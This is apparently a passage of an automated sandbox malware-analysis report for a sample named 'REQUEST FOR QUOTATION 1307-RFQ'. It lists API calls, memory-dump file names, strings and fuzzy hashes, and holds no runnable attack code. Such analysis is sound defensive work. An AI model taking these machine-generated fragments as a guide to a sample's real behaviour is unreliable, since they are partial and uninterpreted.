                                                                                                                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                                                                                                                                                              • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1946975507-0
                                                                                                                                                                                                                              • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                                                                                              • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3974789173-0
                                                                                                                                                                                                                              • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                                                                                              • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __itow_s
                                                                                                                                                                                                                              • String ID: xbL$xbL
                                                                                                                                                                                                                              • API String ID: 3653519197-3351732020
                                                                                                                                                                                                                              • Opcode ID: dcc01ba0ed5f0697ccecc0fe2b3fdcd4052a1b1865999ffeb198b2c01a2bdcec
                                                                                                                                                                                                                              • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcc01ba0ed5f0697ccecc0fe2b3fdcd4052a1b1865999ffeb198b2c01a2bdcec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 0-2276729525
                                                                                                                                                                                                                              • Opcode ID: d6cdaf84dd4cafb72da5b1634ccdc0525b9a1e63ddbcee8990846727ad0f705d
                                                                                                                                                                                                                              • Instruction ID: bccee2b649e71314f1260d68ac9e13b9b833af8cef8c5cc29c8636182850adde
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6cdaf84dd4cafb72da5b1634ccdc0525b9a1e63ddbcee8990846727ad0f705d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7512A61A0C10796CB157B18E9413FF77E0DB60751F708DF8E499822A9EF358CD5EA82
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                                                                              • String ID: LPT
                                                                                                                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                                                                                                                              • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                                                                                              • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                              • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                                                                                              • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                                                                              • String ID: DdL$DdL
                                                                                                                                                                                                                              • API String ID: 1473721057-91670653
                                                                                                                                                                                                                              • Opcode ID: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                                                                                              • Instruction ID: 8cf85b897da21b35b232154f37a53a393289a03a8f02d27ab87a98346ee69310
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 642cbb757c798b464e218aa70decae5e6efc434086f495e8bbeb8dcdbabf2780
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D5113B86043019FD754DF18C580A1ABBF1BF99344F54886EE9859B3A1D339EC91CF4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 0047259E
                                                                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                                                                                                                              • String ID: |
                                                                                                                                                                                                                              • API String ID: 1413715105-2343686810
                                                                                                                                                                                                                              • Opcode ID: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                                                                                                                                                                                              • Instruction ID: 4adfb47e446f893ace23fd506e663b8e952a67a31115c745ae406753cf5a670a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb178aac356a24ff43fec944d9add85da31ada705d33c094a362d2b69604a25d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5313871D00119ABCF11AFA1CC85EEEBFB8FF08344F10406AF918B6162DB756916DB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                              • Opcode ID: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                                                                                              • Instruction ID: c0acac3fdbca48a843832e92e86f2a53b54dc7fac4935119c3a772658612a1a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7b429f46a203bc2f62a8eb9eb86c4b0cdb7e8276fc7fa95013594c94c354db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3318171100604AEDB10AF69CC41BFF73A9FF48754F11892EF9A5D7290DA34AC81CB68
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462911
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                              • Opcode ID: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                                                                                                                                                                                                                              • Instruction ID: 2b4b8058b7b01795732b14ccdc08f7f24d6d082f06cc36c2997a609d376c2748
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcac2d535079ed9cd08b3b53e8268d9c526be6351065196aed15e3907edf445b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE31D871700705BBDB24DE48CE45BAFBBA4EF85350F14001AE881A6291E7B89948CB1B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                              • String ID: Combobox
                                                                                                                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                              • Opcode ID: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                                                                                              • Instruction ID: 7937b7f8ceb80f7c2640562fc72fb2af059ad44b1fd006181b112b31544ba688
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2599c693f4df458194b2d20bee318bb9363e3503390fb5a9e170622b8a8df8eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9111B271200208AFEF51AF54DC81EAF376AEB48368F21092AF91897390D6399C5197A8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                              • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                                                                                              • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                              • String ID: edit
                                                                                                                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                              • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                                                                                              • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
